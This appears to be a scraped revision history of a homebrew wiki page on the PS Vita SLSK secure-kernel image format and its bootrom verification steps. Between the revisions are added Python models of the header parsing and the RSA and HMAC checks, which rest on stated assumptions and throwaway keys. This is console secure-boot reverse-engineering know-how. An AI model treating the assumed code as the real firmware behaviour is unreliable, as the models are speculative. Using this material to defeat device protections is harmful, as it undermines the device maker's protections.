| 0x602 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x603 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x604 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x605-0x607 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x608-0x6FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x700-0x77F || 3 || 0x0000 || ? || 16 public RSA keys for enc, which one is used depends on public key revision from enc header.<br />
|-<br />
| 0x780-0x7FF || 3 || 0x0000 || ? || ?<br />
|}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9521SLSK2018-07-30T00:41:49Z<p>Xyz: /* Signature */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 on other<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, each SLSK shares the first 0xC0 bytes, as observed in 0.931, 0.995 and 1.000.41. Similarly, in retail PUPs each SLSK also shares the first 0xC0 bytes, as observed in 1.05 and 3.60. However, these bytes differ between retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but differs between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (maybe containing version, size, load offset, etc.). Then a 0x100 byte RSA-2048 signature of the header.<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK are not personalized. For both secure_kernel and second_loader, the enc and enp variants share the last 0x340 bytes (although they differ between the two files and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
Reading through the brom code, it appears the last 0x340 bytes are not used in any way.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, the personalization layer is removed. It uses AES-128-CBC with a derived key and decrypts the data at ENC+0xE0 (or ENC+0xD0 if there is no plaintext version string) for a length of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove personalization. Normally, the key is derived using keyslot 0x206. There is, however, an alternative path, triggered in secret debug mode, in which keyslot 0x207 is used instead with a different seed.<br />
<br />
Once personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206 and 0x207 are locked down completely (leaving only 0xA0 protection). However, keyslot 0x8 still allows encryption; this lets the update manager SM add the personalization layer during an update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate an HMAC-SHA256 over the enc header, excluding the RSA signature (typically 0x00 to 0x1C0).<br />
<br />
Two bytes are read from keyring slot 0x603. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, the enc's RSA public key revision is checked against the mask and, if it is allowed, the modulus is fetched from the keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After calculating the powmod, it checks the padding and compares the previously calculated HMAC-SHA256 against the contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F to prevent f00d from reading out the modulus. However, only reading is protected; it should still be possible to encrypt/decrypt using these keyslots.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and the metadata buffer (0x20 bytes at offset 0xE0), the code decryption key is derived and put into keyslot 10. Then, 5 more keys are derived in the same way, using the seed data at [0x100; 0x19F]. These 5 keys are put into keyslots 11, 12, 13, 14 and 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C and 0x20D (all possible AES key revision keys) are then protected.<br />
<br />
The data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is the HMAC-SHA256 of the code segment. An HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated HMAC is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on a bit-flags buffer located right after the plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc it is all zeroes, so no keys should be protected by this function (?)<br />
<br />
=== Decrypting code ===<br />
<br />
Code is decrypted using key 10. Then, the key is protected.<br />
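The steps above, modelled as an added Python example (not code from the wiki, the bootrom or any Vita tool): it parses the plaintext header from the offset table at the top, applies the keyslot 0x603 revision mask, checks the header HMAC-SHA256 against the digest carried by the RSA signature, and compares the slot-10-encrypted code HMAC at [0x1A0; 0x1C0) with an HMAC over the code segment. Little-endian fields, the padding layout inside the signature and every key (the header HMAC key, the code HMAC key, slot-10 decryption modelled as XOR, and a throwaway RSA key) are assumptions or stand-ins; the real derivations from the cmep keyring are not modelled.<br />

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass

SLSK_MAGIC = 0x64B2C8E5
ENC_HDR_SIZE = 0x1E0  # 0xC0 common + 0x20 unique + 0x100 RSA-2048 signature
RSA_SIG_SIZE = 0x100
RSA_E = 65537  # public exponent of the throwaway test key below (assumption)


@dataclass
class SlskHeader:
    code_offset: int
    code_size: int
    aes_key_rev: int  # selects the metadata keyslot 0x208 + rev
    pubkey_rev: int   # selects the RSA modulus at keyslot 0x700 + rev
    body_sha256: bytes
    version: bytes    # empty on 0.931
    enc_off: int      # 0xE0 normally, 0xD0 when there is no version string

def parse_slsk_header(data: bytes) -> SlskHeader:
    """Plaintext header per the offset table above; little-endian fields are an assumption."""
    magic, code_off, ver_len, _unk, code_size = struct.unpack_from("<5I", data, 0)
    if magic != SLSK_MAGIC:
        raise ValueError("bad SLSK magic 0x%08X" % magic)
    aes_rev, pk_rev = struct.unpack_from("<2H", data, 0x14)
    if aes_rev > 5 or pk_rev > 15:
        raise ValueError("key revision out of range")
    if code_off + code_size > len(data):
        raise ValueError("code segment runs past the end of the file")
    enc_off = 0x40 + ver_len + 0x90  # version string, then 0x90 zero bytes
    return SlskHeader(code_off, code_size, aes_rev, pk_rev, data[0x20:0x40],
                      data[0x40:0x40 + ver_len], enc_off)

def select_rsa_modulus(pubkey_rev, allowed_mask, keyring_moduli, hardcoded_n):
    """Keyslot 0x603 mask: 0 -> hardcoded modulus, else the revision bit must be set (slot 0x700+rev)."""
    if allowed_mask == 0:
        return hardcoded_n
    if not (allowed_mask >> pubkey_rev) & 1:
        raise ValueError("RSA key revision %d not in mask 0x%04X" % (pubkey_rev, allowed_mask))
    return keyring_moduli[pubkey_rev]

def rsa_signed_digest(sig: bytes, n: int) -> bytes:
    """powmod + padding check; the 00 01 FF..FF 00 || digest layout is an assumption."""
    em = pow(int.from_bytes(sig, "big"), RSA_E, n).to_bytes(RSA_SIG_SIZE, "big")
    sep = RSA_SIG_SIZE - 0x20 - 1
    if em[:2] != b"\x00\x01" or em[2:sep] != b"\xff" * (sep - 2) or em[sep] != 0:
        raise ValueError("bad signature padding")
    return em[sep + 1:]

def verify_header(data: bytes, hdr: SlskHeader, hdr_hmac_key: bytes, n: int) -> bool:
    """HMAC-SHA256 over [0, sig_off) with the slot-0x20 key (derived from 0x344) vs the signed digest."""
    sig_off = hdr.enc_off + ENC_HDR_SIZE - RSA_SIG_SIZE  # 0x1C0 normally
    calc = hmac.new(hdr_hmac_key, data[:sig_off], hashlib.sha256).digest()
    try:
        signed = rsa_signed_digest(data[sig_off:sig_off + RSA_SIG_SIZE], n)
    except ValueError:
        return False
    return hmac.compare_digest(calc, signed)

def verify_code(data: bytes, hdr: SlskHeader, code_hmac_key: bytes, decrypt_with_slot10) -> bool:
    """Decrypt the code HMAC at [0x1A0, 0x1C0) with slot 10 and compare with an HMAC over the code."""
    off = hdr.enc_off + ENC_HDR_SIZE - RSA_SIG_SIZE - 0x20  # 0x1A0 normally
    expected = decrypt_with_slot10(data[off:off + 0x20])
    code = data[hdr.code_offset:hdr.code_offset + hdr.code_size]
    calc = hmac.new(code_hmac_key, code, hashlib.sha256).digest()
    return hmac.compare_digest(calc, expected)

# --- constructed sample: a fake SLSK signed with a throwaway key ------------
# Multi-prime modulus from known Mersenne primes (2047 bits) so the example runs
# offline without a primality test. Demonstration only, never a real key.
_MERSENNE = (1279, 607, 127, 31, 3)
TEST_N, TEST_PHI = 1, 1
for _k in _MERSENNE:
    TEST_N *= (1 << _k) - 1
    TEST_PHI *= (1 << _k) - 2
TEST_D = pow(RSA_E, -1, TEST_PHI)
HDR_KEY = b"\x11" * 0x20     # stand-in for the key derived from keyslot 0x344
CODE_KEY = b"\x22" * 0x20    # stand-in for the slot-0x20 key used over the code
SLOT10_PAD = b"\x33" * 0x20  # stand-in for slot 10; decryption modelled as XOR

def slot10_decrypt(buf: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(buf, SLOT10_PAD))

def build_sample(code: bytes, pubkey_rev: int = 2, version: bytes = b"00.000.000".ljust(0x10, b"\0")) -> bytes:
    """Header + encrypted header + code; the 0xC0 'common' region is filler (only its HMAC matters here)."""
    enc_off = 0x40 + len(version) + 0x90
    code_off = enc_off + ENC_HDR_SIZE
    hdr = struct.pack("<5I2H8s", SLSK_MAGIC, code_off, len(version), 0, len(code), 0, pubkey_rev, bytes(8))
    hdr += hashlib.sha256(code).digest() + version + bytes(0x90)
    code_hmac = hmac.new(CODE_KEY, code, hashlib.sha256).digest()
    unsigned = hdr + b"\xaa" * 0xC0 + slot10_decrypt(code_hmac)  # XOR is its own inverse
    digest = hmac.new(HDR_KEY, unsigned, hashlib.sha256).digest()
    em = b"\x00\x01" + b"\xff" * (RSA_SIG_SIZE - 0x23) + b"\x00" + digest
    sig = pow(int.from_bytes(em, "big"), TEST_D, TEST_N).to_bytes(RSA_SIG_SIZE, "big")
    return unsigned + sig + code
```

build_sample() yields a constructed image with the version string (0xE0 layout) or, with version=b"", the 0.931-style 0xD0 layout; both pass parse_slsk_header, verify_header and verify_code, and flipping a header or code byte fails the matching check.<br />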
<br />
=== Clear ===<br />
<br />
The remainder (0x1C000 - code_sz) after the decrypted code is cleared with dmac. Dmac regs are also cleared.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9516SLSK2018-07-28T19:45:09Z<p>Xyz: /* Protecting the keys */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 otherwise<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
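<br />
The plaintext header from the table, read by a small parser. This is an added example, not code from the wiki or from the Vita bootrom. It assumes every field is little-endian, that the 0.931 layout is selected by the version-string size at 0x8 being zero, and that the "Offset to code" must lie at or after the end of the 0x1E0 encrypted header. The derived offsets it reports (key seeds at 0xE0, stored code HMAC at 0x1A0, RSA signature at 0x1C0) are the file offsets used in the loading-process description below, shifted by 0x10 for 0.931 images. <code>build_sample_slsk</code> fabricates a constructed image so the parser can be exercised offline; it is not a real SLSK.<br />
<br />
```python
"""Parser for the plaintext SLSK header described in the table above (added
example; little-endian fields assumed, see lead-in)."""
import hashlib
import struct

SLSK_MAGIC = 0x64B2C8E5
ENC_HEADER_SIZE = 0x1E0   # speculated encrypted header, follows the plaintext header
RSA_SIG_SIZE = 0x100      # RSA-2048 signature at the end of the encrypted header
HMAC_SIZE = 0x20


class SlskHeaderError(ValueError):
    pass


def parse_slsk_header(blob: bytes) -> dict:
    """Return the header fields plus the derived offsets the loading process uses,
    rejecting anything outside the value ranges the table documents."""
    if len(blob) < 0x40:
        raise SlskHeaderError("too short for an SLSK header")
    (magic, code_off, ver_str_size, unk_size, code_size,
     aes_rev, rsa_rev) = struct.unpack_from("<IIIIIHH", blob, 0)
    if magic != SLSK_MAGIC:
        raise SlskHeaderError(f"bad magic {magic:#010x}")
    if ver_str_size not in (0, 0x10):
        raise SlskHeaderError(f"unexpected version string size {ver_str_size:#x}")
    if unk_size != 0:
        raise SlskHeaderError(f"unknown block size {unk_size:#x}, only 0 observed")
    if not 0 <= aes_rev <= 5:
        raise SlskHeaderError(f"AES key revision {aes_rev} outside 0..5")
    if not 0 <= rsa_rev <= 15:
        raise SlskHeaderError(f"public key revision {rsa_rev} outside 0..15")
    version = None
    if ver_str_size:
        version = blob[0x40:0x40 + ver_str_size].rstrip(b"\0").decode("ascii", "replace")
    enc_hdr_off = 0xD0 + ver_str_size           # 0xE0 normally, 0xD0 on 0.931
    sig_off = enc_hdr_off + ENC_HEADER_SIZE - RSA_SIG_SIZE
    if code_off < enc_hdr_off + ENC_HEADER_SIZE:
        raise SlskHeaderError("code offset overlaps the encrypted header")
    if len(blob) < code_off + code_size:
        raise SlskHeaderError("code segment extends past end of image")
    return {
        "code_offset": code_off,
        "code_size": code_size,
        "aes_key_revision": aes_rev,
        "pubkey_revision": rsa_rev,
        "body_sha256": blob[0x20:0x40],
        "version": version,
        "enc_header_offset": enc_hdr_off,
        # range the bootrom strips the personalization layer from (AES-128-CBC)
        "personalized_range": (enc_hdr_off, enc_hdr_off + ENC_HEADER_SIZE + code_size),
        "key_seed_offset": enc_hdr_off,           # 0x20-byte metadata seed, then 5 more
        "code_hmac_offset": sig_off - HMAC_SIZE,  # encrypted HMAC of the code segment
        "rsa_sig_offset": sig_off,
        "signed_range": (0, sig_off),             # header HMAC covers everything before the sig
    }


def body_hash_matches(hdr: dict, decrypted_body: bytes) -> bool:
    """Check the SHA-256 stored at 0x20 against a decrypted body."""
    return hashlib.sha256(decrypted_body).digest() == hdr["body_sha256"]


def build_sample_slsk(version: bytes, code: bytes, aes_rev: int = 3, rsa_rev: int = 0) -> bytes:
    """Constructed sample image laid out per the table (not a real SLSK: the
    encrypted header is filler and the code is stored as given)."""
    ver_str_size = 0x10 if version else 0
    enc_hdr_off = 0xD0 + ver_str_size
    code_off = enc_hdr_off + ENC_HEADER_SIZE
    img = bytearray(code_off)
    struct.pack_into("<IIIIIHH", img, 0, SLSK_MAGIC, code_off, ver_str_size, 0,
                     len(code), aes_rev, rsa_rev)
    img[0x20:0x40] = hashlib.sha256(code).digest()
    if version:
        img[0x40:0x50] = version[:0x10].ljust(0x10, b"\0")
    img[enc_hdr_off:code_off] = b"\xAA" * ENC_HEADER_SIZE
    return bytes(img) + code
```
<br />
The range checks are the useful part when pointing this at real dumps: an AES key revision above 5 or a public key revision above 15 means either a layout the table does not cover or a file that is not an SLSK at all, and the derived <code>personalized_range</code> is the exact span that must be AES-128-CBC decrypted before any of the later offsets mean anything.<br />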
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, every SLSK shares the first 0xC0 bytes, as observed in 0.931, 0.995 and 1.000.41. Similarly, in retail PUPs every SLSK shares the first 0xC0 bytes, as observed in 1.05 and 3.60. However, these bytes differ between retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but differs between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (perhaps containing version, size, load offset, etc.). Finally there is a 0x100 byte RSA-2048 signature of the header (0xC0 + 0x20 + 0x100 = 0x1E0).<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK are not personalized. For both secure_kernel and second_loader, the enc and enp variants share the last 0x340 bytes (although they differ between the two files and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, the personalization layer is removed. This uses AES-128-CBC with a derived key and decrypts the data at ENC+0xE0 (or ENC+0xD0 if there is no plaintext version string) for a length of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove the personalization. Normally, the key is derived using keyslot 0x206. There is, however, an alternative path, triggered in secret debug mode, in which keyslot 0x207 is used instead with a different plaintext.<br />
<br />
Once the personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206 and 0x207 are locked down completely (leaving only the 0xA0 protection). Keyslot 0x8, however, still allows encryption; this lets the update manager SM add the personalization layer during an update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over the header up to, but excluding, the RSA signature (typically file offsets 0x00 to 0x1C0, i.e. the plaintext header plus the part of the decrypted encrypted header that precedes the signature).<br />
<br />
Two bytes are read from keyring slot 0x603. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, the public key revision from the header is checked against the mask and, if it is allowed, the modulus is fetched from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After computing the modular exponentiation, it checks the padding and compares the previously calculated HMAC-SHA256 against the recovered contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F so that f00d cannot read the modulus back out.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and the metadata buffer (the 0x20 bytes at offset 0xE0, the start of the decrypted encrypted header), the code decryption key is derived and put into keyslot 10. Then five more keys are derived in the same way from the seed data at [0x100; 0x1A0) (0x20 bytes each) and put into keyslots 11, 12, 13, 14 and 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is the HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated HMAC is compared to the decrypted one.<br />
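<br />
The header RSA check and the code HMAC check above, modelled end to end. This is an added example, not the wiki's or the bootrom's code. Offsets are the normal ones given in this section, read as file offsets: the header HMAC covers [0x00; 0x1C0), the RSA-2048 signature sits at [0x1C0; 0x2C0), the stored code HMAC at [0x1A0; 0x1C0), and the code follows the signature. Things the page does not state and the example assumes: the signature is PKCS#1 v1.5 type-1 padding (00 01 FF..FF 00) around the raw HMAC; a public key revision is allowed when bit (1 << revision) of the 0x603 mask is set; the AES steps (personalization removal, keyslot-10 decryption of the stored HMAC, key derivation) are not modelled, so the keyslot-0x20 key and the stored HMAC are handled as plaintext. <code>generate_rsa</code> makes a throwaway example key and <code>build_signed_sample</code> a constructed image; none of the values are real Vita keys.<br />
<br />
```python
"""Model of the SLSK header RSA check and code HMAC check (added example;
file offsets of the normal layout; see lead-in for assumptions)."""
import hashlib
import hmac
import secrets

CODE_HMAC_OFF, SIG_OFF = 0x1A0, 0x1C0   # stored code HMAC, RSA signature
SLSK_MAGIC = 0x64B2C8E5


def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin, sufficient for a throwaway example key."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_rsa(bits: int = 2048, e: int = 65537):
    """Return (n, e, d); the top two bits of each prime are set so n is exactly `bits` wide."""
    def prime(b):
        while True:
            c = secrets.randbits(b) | (3 << (b - 2)) | 1
            if _is_probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:        # e is prime, so this is gcd(e, phi) == 1
            return p * q, e, pow(e, -1, phi)


def pkcs1_v15_pad(digest: bytes, k: int) -> bytes:
    """00 01 FF..FF 00 || digest, no DigestInfo (assumed padding, see lead-in)."""
    return b"\x00\x01" + b"\xff" * (k - len(digest) - 3) + b"\x00" + digest


def select_modulus(mask: int, rsa_rev: int, keyring: dict, hardcoded_n: int):
    """Keyslot 0x603 mask logic: zero mask -> hardcoded modulus, otherwise the
    header's public key revision must be enabled and is looked up in RSA storage."""
    if mask == 0:
        return hardcoded_n
    if not (mask >> rsa_rev) & 1:
        return None
    return keyring.get(rsa_rev)


def header_signature_ok(image: bytes, hdr_key: bytes, n: int, e: int) -> bool:
    """HMAC-SHA256 (keyslot 0x20 key) over [0x00; 0x1C0), then RSA powmod and padding check."""
    k = (n.bit_length() + 7) // 8
    s = int.from_bytes(image[SIG_OFF:SIG_OFF + k], "big")
    if s >= n:
        return False
    em = pow(s, e, n).to_bytes(k, "big")
    expected = hmac.new(hdr_key, image[:SIG_OFF], hashlib.sha256).digest()
    # Compare the whole encoded message in constant time; scanning for the
    # hash after a loosely checked padding is how forgeries get accepted.
    return hmac.compare_digest(em, pkcs1_v15_pad(expected, k))


def verify_slsk(image: bytes, hdr_key: bytes, mask: int, rsa_rev: int,
                keyring: dict, hardcoded_n: int, e: int = 65537) -> str:
    """Run the checks in the bootrom's order; returns "ok" or the failing step."""
    n = select_modulus(mask, rsa_rev, keyring, hardcoded_n)
    if n is None:
        return "rsa revision not allowed"
    if not header_signature_ok(image, hdr_key, n, e):
        return "header signature mismatch"
    code_off = SIG_OFF + (n.bit_length() + 7) // 8
    code_size = int.from_bytes(image[0x10:0x14], "little")
    stored = image[CODE_HMAC_OFF:SIG_OFF]   # AES-decrypted with keyslot 10 on hardware
    # HMAC over the code segment with the same keyslot 0x20 key; the code itself
    # is only decrypted with keyslot 10 after this check passes.
    calc = hmac.new(hdr_key, image[code_off:code_off + code_size], hashlib.sha256).digest()
    return "ok" if hmac.compare_digest(calc, stored) else "code HMAC mismatch"


def build_signed_sample(code: bytes, hdr_key: bytes, priv: tuple) -> bytes:
    """Constructed image (not a real SLSK): 0x1C0-byte header, signature, code."""
    n, _, d = priv
    k = (n.bit_length() + 7) // 8
    head = bytearray(SIG_OFF)
    head[0:4] = SLSK_MAGIC.to_bytes(4, "little")
    head[0x04:0x08] = (SIG_OFF + k).to_bytes(4, "little")          # offset to code
    head[0x10:0x14] = len(code).to_bytes(4, "little")              # code size
    head[0xE0:CODE_HMAC_OFF] = secrets.token_bytes(CODE_HMAC_OFF - 0xE0)  # key seeds
    head[CODE_HMAC_OFF:SIG_OFF] = hmac.new(hdr_key, code, hashlib.sha256).digest()
    mac = hmac.new(hdr_key, bytes(head), hashlib.sha256).digest()
    m = int.from_bytes(pkcs1_v15_pad(mac, k), "big")
    return bytes(head) + pow(m, d, n).to_bytes(k, "big") + code
```
<br />
Flipping a byte of the code leaves the signature valid but fails the code HMAC step, while touching any header byte (for example the code size at 0x10) fails at the signature; that is the order the bootrom enforces, and it is why the signature only needs to cover the 0x1C0-byte header to bind the whole image. The encoded message is compared whole in constant time rather than parsed for the hash after the padding, the usual lesson from lenient PKCS#1 v1.5 checks.<br />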
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on a bit-flags buffer located right after the plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc this buffer is all zeroes, so no keys should be protected by this function (?)</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=SLSK&diff=9515SLSK2018-07-28T19:45:02Z<p>Xyz: /* Bootrom enc loading process */</p>
<hr />
<div><br />
{| class="wikitable"<br />
|-<br />
! Offset !! Size !! Description<br />
|-<br />
| 0x0 || 0x4 || <code>0x64B2C8E5</code> magic<br />
|-<br />
| 0x4 || 0x4 || Offset to code<br />
|-<br />
| 0x8 || 0x4 || Size of plaintext version string, 0 on 0.931, 0x10 otherwise<br />
|-<br />
| 0xC || 0x4 || Size of unknown block, only seen as 0<br />
|-<br />
| 0x10 || 0x4 || Code size<br />
|-<br />
| 0x14 || 0x2 || AES key revision, possible values 0 to 5<br />
|-<br />
| 0x16 || 0x2 || Public key revision, possible values 0 to 15<br />
|-<br />
| 0x18 || 0x8 || Unknown/zero<br />
|-<br />
| 0x20 || 0x20 || sha256 hash of decrypted body<br />
|-<br />
| 0x40 || 0x10 || Version in ASCII, not present on 0.931<br />
|-<br />
| 0x50 (0x40 on 0.931) || 0x90 || Zero<br />
|-<br />
| 0xE0 (0xD0 on 0.931) || Until Data || Encrypted Header<br />
|-<br />
|}<br />
<br />
== Encrypted Header ==<br />
<br />
At offset 0xE0 there is a 0x1E0 sized buffer that is speculated to be an encrypted header. For any given firmware version, secure_kernel.enc/second_loader.enc and secure_kernel.enp/second_loader.enp share the first 0xC0 bytes. For non-retail PUPs, every SLSK shares the first 0xC0 bytes, as observed in 0.931, 0.995 and 1.000.41. Similarly, in retail PUPs every SLSK shares the first 0xC0 bytes, as observed in 1.05 and 3.60. However, these bytes differ between retail and non-retail SLSK.<br />
<br />
There is likely a 0xC0 sized "common" header that is shared by every firmware and by both secure_kernel and second_loader but differs between retail and non-retail builds. Then there is likely a 0x20 byte section that is unique per SLSK (perhaps containing version, size, load offset, etc.). Finally there is a 0x100 byte RSA-2048 signature of the header (0xC0 + 0x20 + 0x100 = 0x1E0).<br />
<br />
== Signature ==<br />
<br />
The last 0x340 bytes of each SLSK are not personalized. For both secure_kernel and second_loader, the enc and enp variants share the last 0x340 bytes (although they differ between the two files and across firmwares). This is likely the signature and might also contain certificates.<br />
<br />
== Bootrom enc loading process ==<br />
<br />
=== Remove personalization ===<br />
<br />
First, the personalization layer is removed. This uses AES-128-CBC with a derived key and decrypts the data at ENC+0xE0 (or ENC+0xD0 if there is no plaintext version string) for a length of code_size+0x1E0.<br />
<br />
There are two possible paths to derive the key used to remove the personalization. Normally, the key is derived using keyslot 0x206. There is, however, an alternative path, triggered in secret debug mode, in which keyslot 0x207 is used instead with a different plaintext.<br />
<br />
Once the personalization is removed, the source keys are locked down. Keyslots 0x9, 0x206 and 0x207 are locked down completely (leaving only the 0xA0 protection). Keyslot 0x8, however, still allows encryption; this lets the update manager SM add the personalization layer during an update without having to derive the keys itself.<br />
<br />
=== Header RSA check ===<br />
<br />
A key is derived from keyslot 0x344 and put into keyslot 0x20. This key is then immediately used to calculate HMAC-SHA256 over the header up to, but excluding, the RSA signature (typically file offsets 0x00 to 0x1C0, i.e. the plaintext header plus the part of the decrypted encrypted header that precedes the signature).<br />
<br />
Two bytes are read from keyring slot 0x603. This is the bitmask of allowed RSA public keys (0xFFFF on 1.692). If the mask is zero, a hardcoded RSA modulus is used. Otherwise, the public key revision from the header is checked against the mask and, if it is allowed, the modulus is fetched from keyring RSA storage starting at keyslot 0x700.<br />
<br />
The signature is typically located at 0x1C0 and is 0x100 bytes. After computing the modular exponentiation, it checks the padding and compares the previously calculated HMAC-SHA256 against the recovered contents.<br />
<br />
Finally, it protects keyslots 0x700 to 0x77F so that f00d cannot read the modulus back out.<br />
<br />
=== Metadata decryption and code verification ===<br />
<br />
Using keyslot 0x208+aes_key_revision and the metadata buffer (the 0x20 bytes at offset 0xE0, the start of the decrypted encrypted header), the code decryption key is derived and put into keyslot 10. Then five more keys are derived in the same way from the seed data at [0x100; 0x1A0) (0x20 bytes each) and put into keyslots 11, 12, 13, 14 and 15.<br />
<br />
Keyslots 0x208, 0x209, 0x20A, 0x20B, 0x20C, 0x20D (all possible AES key revision keys) are protected.<br />
<br />
Data at [0x1A0; 0x1C0) is decrypted using keyslot 10. This is the HMAC-SHA256 of the code segment. HMAC-SHA256 is calculated over the code segment using keyslot 0x20, then keyslot 0x20 is protected. Finally, the calculated HMAC is compared to the decrypted one.<br />
<br />
=== Protecting the keys ===<br />
<br />
Some keys are protected, depending on a bit-flags buffer located right after the plaintext version string (so, at offset 0x50). However, on the latest 3.68 enc this buffer is all zeroes, so no keys should be protected by this function (?)</div>Xyz